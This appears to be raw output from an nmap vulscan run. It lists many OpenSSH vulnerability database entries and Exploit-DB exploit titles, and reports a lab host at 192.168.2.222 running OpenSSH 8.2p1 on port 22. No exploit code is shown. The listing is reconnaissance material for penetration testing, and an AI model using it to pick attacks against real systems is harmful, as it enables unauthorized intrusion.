[20956] OpenSSH Privilege Separation Key Signature Weakness
[20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness
[20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness
[20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability
[20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability
[16892] OpenSSH Remote PAM Denial Of Service Vulnerability
[14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability
[14729] OpenSSH GSSAPI Credential Disclosure Vulnerability
[14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability
[11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability
[9986] RCP, OpenSSH SCP Client File Corruption Vulnerability
[9040] OpenSSH PAM Conversation Memory Scrubbing Weakness
[8677] Multiple Portable OpenSSH PAM Vulnerabilities
[8628] OpenSSH Buffer Mismanagement Vulnerabilities
[7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability
[7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness
[7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability
[7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness
[6168] OpenSSH Visible Password Vulnerability
[5374] OpenSSH Trojan Horse Vulnerability
[5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities
[4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
[4241] OpenSSH Channel Code Off-By-One Vulnerability
[3614] OpenSSH UseLogin Environment Variable Passing Vulnerability
[3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability
[3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability
[3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability
[2917] OpenSSH PAM Session Evasion Vulnerability
[2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability
[2356] OpenSSH Private Key Authentication Check Vulnerability
[1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability
[1334] OpenSSH UseLogin Vulnerability

IBM X-Force - https://exchange.xforce.ibmcloud.com:
[83258] GSI-OpenSSH auth-pam.c security bypass
[82781] OpenSSH time limit denial of service
[82231] OpenSSH pam_ssh_agent_auth PAM code execution
[74809] OpenSSH ssh_gssapi_parse_ename denial of service
[72756] Debian openssh-server commands information disclosure
[68339] OpenSSH pam_thread buffer overflow
[67264] OpenSSH ssh-keysign unauthorized access
[65910] OpenSSH remote_glob function denial of service
[65163] OpenSSH certificate information disclosure
[64387] OpenSSH J-PAKE security bypass
[63337] Cisco Unified Videoconferencing OpenSSH weak security
[46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure
[45202] OpenSSH signal handler denial of service
[44747] RHEL OpenSSH backdoor
[44280] OpenSSH PermitRootLogin information disclosure
[44279] OpenSSH sshd weak security
[44037] OpenSSH sshd SELinux role unauthorized access
[43940] OpenSSH X11 forwarding information disclosure
[41549] OpenSSH ForceCommand directive security bypass
[41438] OpenSSH sshd session hijacking
[40897] OpenSSH known_hosts weak security
[40587] OpenSSH username weak security
[37371] OpenSSH username data manipulation
[37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed
[37112] RHSA update for OpenSSH signal handler race condition not installed
[37107] RHSA update for OpenSSH identical block denial of service not installed
[36637] OpenSSH X11 cookie privilege escalation
[35167] OpenSSH packet.c newkeys[mode] denial of service
[34490] OpenSSH OPIE information disclosure
[33794] OpenSSH ChallengeResponseAuthentication information disclosure
[32975] Apple Mac OS X OpenSSH denial of service
[32387] RHSA-2006:0738 updates for openssh not installed
[32359] RHSA-2006:0697 updates for openssh not installed
[32230] RHSA-2006:0298 updates for openssh not installed
[32132] RHSA-2006:0044 updates for openssh not installed
[30120] OpenSSH privilege separation monitor authentication verification weakness
[29255] OpenSSH GSSAPI user enumeration
[29254] OpenSSH signal handler race condition
[29158] OpenSSH identical block denial of service
[28147] Apple Mac OS X OpenSSH nonexistent user login denial of service
[25116] OpenSSH OpenPAM denial of service
[24305] OpenSSH SCP shell expansion command execution
[22665] RHSA-2005:106 updates for openssh not installed
[22117] OpenSSH GSSAPI allows elevated privileges
[22115] OpenSSH GatewayPorts security bypass
[20930] OpenSSH sshd.c LoginGraceTime denial of service
[19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service
[17213] OpenSSH allows port bouncing attacks
[16323] OpenSSH scp file overwrite
[13797] OpenSSH PAM information leak
[13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack
[13264] OpenSSH PAM code could allow an attacker to gain access
[13215] OpenSSH buffer management errors could allow an attacker to execute code
[13214] OpenSSH memory vulnerabilities
[13191] OpenSSH large packet buffer overflow
[12196] OpenSSH could allow an attacker to bypass login restrictions
[11970] OpenSSH could allow an attacker to obtain valid administrative account
[11902] OpenSSH PAM support enabled information leak
[9803] OpenSSH &quot
[9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse
[9307] OpenSSH is running on the system
[9169] OpenSSH &quot
[8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
[8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database
[8383] OpenSSH off-by-one error in channel code
[7647] OpenSSH UseLogin option arbitrary code execution
[7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions
[7598] OpenSSH with Kerberos allows attacker to gain elevated privileges
[7179] OpenSSH source IP access control bypass
[6757] OpenSSH &quot
[6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files
[6084] OpenSSH 2.3.1 allows remote users to bypass authentication
[5517] OpenSSH allows unauthorized access to resources
[4646] OpenSSH UseLogin option allows remote users to execute commands as root

Exploit-DB - https://www.exploit-db.com:
[21579] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (2)
[21578] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (1)
[21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
[21314] OpenSSH 2.x/3.0.1/3.0.2 Channel Code Off-By-One Vulnerability
[20253] OpenSSH 1.2 scp File Create/Overwrite Vulnerability
[17462] FreeBSD OpenSSH 3.5p1 - Remote Root Exploit
[14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow
[6094] Debian OpenSSH Remote SELinux Privilege Elevation Exploit (auth)
[3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit
[2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
[1572] Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service
[258] glibc-2.2 and openssh-2.3.0p1 exploits glibc => 2.1.9x
[26] OpenSSH/PAM <= 3.6.1p1 Remote Users Ident (gossh.sh)
[25] OpenSSH/PAM <= 3.6.1p1 Remote Users Discovery Tool

OpenVAS (Nessus) - http://www.openvas.org:
[902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
[900179] OpenSSH CBC Mode Information Disclosure Vulnerability
[881183] CentOS Update for openssh CESA-2012:0884 centos6 
[880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
[880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
[870763] RedHat Update for openssh RHSA-2012:0884-04
[870129] RedHat Update for openssh RHSA-2008:0855-01
[861813] Fedora Update for openssh FEDORA-2010-5429
[861319] Fedora Update for openssh FEDORA-2007-395
[861170] Fedora Update for openssh FEDORA-2007-394
[861012] Fedora Update for openssh FEDORA-2007-715
[840345] Ubuntu Update for openssh vulnerability USN-597-1
[840300] Ubuntu Update for openssh update USN-612-5
[840271] Ubuntu Update for openssh vulnerability USN-612-2
[840268] Ubuntu Update for openssh update USN-612-7
[840259] Ubuntu Update for openssh vulnerabilities USN-649-1
[840214] Ubuntu Update for openssh vulnerability USN-566-1
[831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
[830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
[830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
[830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
[830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
[830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
[830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
[802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
[103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
[103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
[103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
[100584] OpenSSH X Connections Session Hijacking Vulnerability
[100153] OpenSSH CBC Mode Information Disclosure Vulnerability
[66170] CentOS Security Advisory CESA-2009:1470 (openssh)
[65987] SLES10: Security update for OpenSSH
[65819] SLES10: Security update for OpenSSH
[65514] SLES9: Security update for OpenSSH
[65513] SLES9: Security update for OpenSSH
[65334] SLES9: Security update for OpenSSH
[65248] SLES9: Security update for OpenSSH
[65218] SLES9: Security update for OpenSSH
[65169] SLES9: Security update for openssh,openssh-askpass
[65126] SLES9: Security update for OpenSSH
[65019] SLES9: Security update for OpenSSH
[65015] SLES9: Security update for OpenSSH
[64931] CentOS Security Advisory CESA-2009:1287 (openssh)
[61639] Debian Security Advisory DSA 1638-1 (openssh)
[61030] Debian Security Advisory DSA 1576-2 (openssh)
[61029] Debian Security Advisory DSA 1576-1 (openssh)
[60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
[60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
[60667] Slackware Advisory SSA:2008-095-01 openssh 
[59014] Slackware Advisory SSA:2007-255-01 openssh 
[58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
[57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
[57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
[57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
[57492] Slackware Advisory SSA:2006-272-02 openssh 
[57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
[57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
[57470] FreeBSD Ports: openssh
[56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
[56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
[56294] Slackware Advisory SSA:2006-045-06 openssh 
[53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages 
[53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory 
[53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again 
[53788] Debian Security Advisory DSA 025-1 (openssh)
[52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
[52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
[11343] OpenSSH Client Unauthorized Remote Forwarding
[10954] OpenSSH AFS/Kerberos ticket/token passing
[10883] OpenSSH Channel Code Off by 1
[10823] OpenSSH UseLogin Environment Variables

SecurityTracker - https://www.securitytracker.com:
[1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
[1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
[1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
[1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
[1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
[1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
[1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
[1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
[1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
[1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
[1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
[1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
[1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
[1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
[1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
[1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
[1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
[1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
[1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
[1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
[1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
[1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
[1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
[1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
[1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
[1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
[1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
[1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
[1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
[1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
[1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
[1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
[1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
[1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
[1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
[1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
[1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
[1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies

OSVDB - http://www.osvdb.org:
[92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
[90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
[90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
[81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
[78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
[75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
[75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
[75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
[72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
[70873] OpenSSH Legacy Certificates Stack Memory Disclosure
[69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
[67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
[59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
[58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
[56921] OpenSSH Unspecified Remote Compromise
[53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
[50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
[49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
[48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
[47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
[47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
[45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
[43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
[43745] OpenSSH X11 Forwarding Local Session Hijacking
[43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
[39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
[37315] pam_usb OpenSSH Authentication Unspecified Issue
[34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
[34601] OPIE w/ OpenSSH Account Enumeration
[34600] OpenSSH S/KEY Authentication Account Enumeration
[32721] OpenSSH Username Password Complexity Account Enumeration
[30232] OpenSSH Privilege Separation Monitor Weakness
[29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
[29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
[29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
[29152] OpenSSH Identical Block Packet DoS
[27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
[23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
[22692] OpenSSH scp Command Line Filename Processing Command Injection
[20216] OpenSSH with KerberosV Remote Authentication Bypass
[19142] OpenSSH Multiple X11 Channel Forwarding Leaks
[19141] OpenSSH GSSAPIAuthentication Credential Escalation
[18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
[16567] OpenSSH Privilege Separation LoginGraceTime DoS
[16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
[9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
[9550] OpenSSH scp Traversal Arbitrary File Overwrite
[6601] OpenSSH *realloc() Unspecified Memory Errors
[6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
[6073] OpenSSH on FreeBSD libutil Arbitrary File Read
[6072] OpenSSH PAM Conversation Function Stack Modification
[6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
[5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
[5408] OpenSSH echo simulation Information Disclosure
[5113] OpenSSH NIS YP Netgroups Authentication Bypass
[4536] OpenSSH Portable AIX linker Privilege Escalation
[3938] OpenSSL and OpenSSH /dev/random Check Failure
[3456] OpenSSH buffer_append_space() Heap Corruption
[2557] OpenSSH Multiple Buffer Management Multiple Overflows
[2140] OpenSSH w/ PAM Username Validity Timing Attack
[2112] OpenSSH Reverse DNS Lookup Bypass
[2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
[1853] OpenSSH Symbolic Link 'cookies' File Removal
[839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
[781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
[730] OpenSSH Channel Code Off by One Remote Privilege Escalation
[688] OpenSSH UseLogin Environment Variable Local Command Execution
[642] OpenSSH Multiple Key Type ACL Bypass
[504] OpenSSH SSHv2 Public Key Authentication Bypass
[341] OpenSSH UseLogin Local Privilege Escalation

Misc Metrics (click to expand)

192.168.2.222(online)

Address

192.168.2.222 (ipv4)
00:0C:29:D2:88:50 - VMware (mac)

Ports

The 995 ports scanned but not shown below are in state: filtered

995 ports replied with: no-response

Port		State (toggle closed [2] \| filtered [0])	Service	Reason	Product	Version	Extra info
22	tcp	open	ssh	syn-ack	OpenSSH	8.2p1 Ubuntu 4ubuntu0.5	Ubuntu Linux; protocol 2.0
	vulscan	VulDB - https://vuldb.com: [155909] OpenSSH 8.2 scp Client privilege escalation [170814] OpenSSH up to 8.4 ssh-agent double free [158983] OpenSSH up to 8.3p1 scp scp.c privilege escalation [157436] OpenSSH up to 8.3 Algorithm Negotiation information disclosure MITRE CVE - https://cve.mitre.org: [CVE-2007-4654] Unspecified vulnerability in SSHield 1.6.1 with OpenSSH 3.0.2p1 on Cisco WebNS 8.20.0.1 on Cisco Content Services Switch (CSS) series 11000 devices allows remote attackers to cause a denial of service (connection slot exhaustion and device crash) via a series of large packets designed to exploit the SSH CRC32 attack detection overflow (CVE-2001-0144), possibly a related issue to CVE-2002-1024. [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632. [CVE-1999-0661] A system is running a version of software that was replaced with a Trojan Horse at one of its distribution points, such as (1) TCP Wrappers 7.6, (2) util-linux 2.9g, (3) wuarchive ftpd (wuftpd) 2.2 and 2.1f, (4) IRC client (ircII) ircII 2.2.9, (5) OpenSSH 3.4p1, or (6) Sendmail 8.12.6. SecurityFocus - https://www.securityfocus.com/bid/: [102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities [101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability [94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability [94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability [94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability [94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability [93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability [92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability [92210] OpenSSH CBC Padding Weak Encryption Security Weakness [92209] OpenSSH MAC Verification Security Bypass Vulnerability [91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability [90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability [90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability [89385] OpenSSH CVE-2005-2666 Local Security Vulnerability [88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability [88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability [88367] OpenSSH CVE-1999-1010 Local Security Vulnerability [87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability [86187] OpenSSH 'session.c' Local Security Bypass Vulnerability [86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability [84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability [84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability [84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability [81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability [80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability [80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability [76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability [76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities [75990] OpenSSH Login Handling Security Bypass Weakness [75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability [71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability [68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities [66459] OpenSSH Certificate Validation Security Bypass Vulnerability [66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability [65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability [65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability [61286] OpenSSH Remote Denial of Service Vulnerability [58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability [58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability [54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability [51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability [50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability [49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness [48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability [47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability [46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability [45304] OpenSSH J-PAKE Security Bypass Vulnerability [36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability [32319] OpenSSH CBC Mode Information Disclosure Vulnerability [30794] Red Hat OpenSSH Backdoor Vulnerability [30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability [30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability [28531] OpenSSH ForceCommand Command Execution Weakness [28444] OpenSSH X Connections Session Hijacking Vulnerability [26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness [25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability [23601] OpenSSH S/Key Remote Information Disclosure Vulnerability [20956] OpenSSH Privilege Separation Key Signature Weakness [20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness [20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness [20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability [20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability [16892] OpenSSH Remote PAM Denial Of Service Vulnerability [14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability [14729] OpenSSH GSSAPI Credential Disclosure Vulnerability [14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability [11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability [9986] RCP, OpenSSH SCP Client File Corruption Vulnerability [9040] OpenSSH PAM Conversation Memory Scrubbing Weakness [8677] Multiple Portable OpenSSH PAM Vulnerabilities [8628] OpenSSH Buffer Mismanagement Vulnerabilities [7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability [7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness [7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability [7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness [6168] OpenSSH Visible Password Vulnerability [5374] OpenSSH Trojan Horse Vulnerability [5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability [4241] OpenSSH Channel Code Off-By-One Vulnerability [3614] OpenSSH UseLogin Environment Variable Passing Vulnerability [3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability [3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability [3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability [2917] OpenSSH PAM Session Evasion Vulnerability [2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability [2356] OpenSSH Private Key Authentication Check Vulnerability [1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability [1334] OpenSSH UseLogin Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [83258] GSI-OpenSSH auth-pam.c security bypass [82781] OpenSSH time limit denial of service [82231] OpenSSH pam_ssh_agent_auth PAM code execution [74809] OpenSSH ssh_gssapi_parse_ename denial of service [72756] Debian openssh-server commands information disclosure [68339] OpenSSH pam_thread buffer overflow [67264] OpenSSH ssh-keysign unauthorized access [65910] OpenSSH remote_glob function denial of service [65163] OpenSSH certificate information disclosure [64387] OpenSSH J-PAKE security bypass [63337] Cisco Unified Videoconferencing OpenSSH weak security [46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure [45202] OpenSSH signal handler denial of service [44747] RHEL OpenSSH backdoor [44280] OpenSSH PermitRootLogin information disclosure [44279] OpenSSH sshd weak security [44037] OpenSSH sshd SELinux role unauthorized access [43940] OpenSSH X11 forwarding information disclosure [41549] OpenSSH ForceCommand directive security bypass [41438] OpenSSH sshd session hijacking [40897] OpenSSH known_hosts weak security [40587] OpenSSH username weak security [37371] OpenSSH username data manipulation [37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed [37112] RHSA update for OpenSSH signal handler race condition not installed [37107] RHSA update for OpenSSH identical block denial of service not installed [36637] OpenSSH X11 cookie privilege escalation [35167] OpenSSH packet.c newkeys[mode] denial of service [34490] OpenSSH OPIE information disclosure [33794] OpenSSH ChallengeResponseAuthentication information disclosure [32975] Apple Mac OS X OpenSSH denial of service [32387] RHSA-2006:0738 updates for openssh not installed [32359] RHSA-2006:0697 updates for openssh not installed [32230] RHSA-2006:0298 updates for openssh not installed [32132] RHSA-2006:0044 updates for openssh not installed [30120] OpenSSH privilege separation monitor authentication verification weakness [29255] OpenSSH GSSAPI user enumeration [29254] OpenSSH signal handler race condition [29158] OpenSSH identical block denial of service [28147] Apple Mac OS X OpenSSH nonexistent user login denial of service [25116] OpenSSH OpenPAM denial of service [24305] OpenSSH SCP shell expansion command execution [22665] RHSA-2005:106 updates for openssh not installed [22117] OpenSSH GSSAPI allows elevated privileges [22115] OpenSSH GatewayPorts security bypass [20930] OpenSSH sshd.c LoginGraceTime denial of service [19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service [17213] OpenSSH allows port bouncing attacks [16323] OpenSSH scp file overwrite [13797] OpenSSH PAM information leak [13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack [13264] OpenSSH PAM code could allow an attacker to gain access [13215] OpenSSH buffer management errors could allow an attacker to execute code [13214] OpenSSH memory vulnerabilities [13191] OpenSSH large packet buffer overflow [12196] OpenSSH could allow an attacker to bypass login restrictions [11970] OpenSSH could allow an attacker to obtain valid administrative account [11902] OpenSSH PAM support enabled information leak [9803] OpenSSH &quot [9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse [9307] OpenSSH is running on the system [9169] OpenSSH &quot 